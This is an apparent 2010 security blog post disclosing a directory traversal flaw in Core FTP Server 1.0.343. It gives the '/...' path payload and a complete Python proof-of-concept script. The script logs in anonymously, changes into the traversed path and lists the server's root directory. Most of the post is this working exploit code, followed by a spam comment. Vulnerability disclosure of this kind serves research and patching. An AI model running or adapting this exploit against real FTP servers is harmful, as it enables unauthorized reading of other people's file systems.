This site is soon to be deprecated by http://www.johnleitch.net

Thursday, May 27, 2010

Core FTP Server 1.0.343 Directory Traversal

It's possible to navigate the local file system of a server running Core FTP Server 1.0.343 by using a specially crafted URL.

Exploit
/...

PoC
list_root.py
import sys, socket, re

host = 'localhost'
port = 21
user = 'anonymous'
password = 'a'

buffer_size = 8192
timeout = 8

def recv(s):
resp = ''

while 1:
r = s.recv(buffer_size)
if not r: break
resp += r

return resp

def list_root():
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.settimeout(timeout)

print s.recv(buffer_size)

s.send('USER ' + user + '\r\n')
print s.recv(buffer_size)

s.send('PASS ' + password + '\r\n')
print s.recv(buffer_size) + s.recv(buffer_size)

s.send('CWD ' + '/...' * 16 + '\r\n')

resp = s.recv(buffer_size)

print resp

if resp[:3] == '250':
s.send('PASV\r\n')
resp = s.recv(buffer_size)

print resp

pasv_info = re.search(u'(\d+),(\d+),(\d+),(\d+),(\d+),(\d+)', resp)

if (pasv_info == None):
print 'Invalid PASV response: ' + resp
return

s.send('LIST\r\n')

s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s2.connect((host, int(pasv_info.group(5)) * 256 + int(pasv_info.group(6))))
s2.settimeout(timeout)

print recv(s2)

s.close()

except Exception:
print sys.exc_info()

list_root()

1 comment:

  1. video sharing I was reading some of your content on this website and I conceive this internet site is really informative ! Keep on putting up.

    ReplyDelete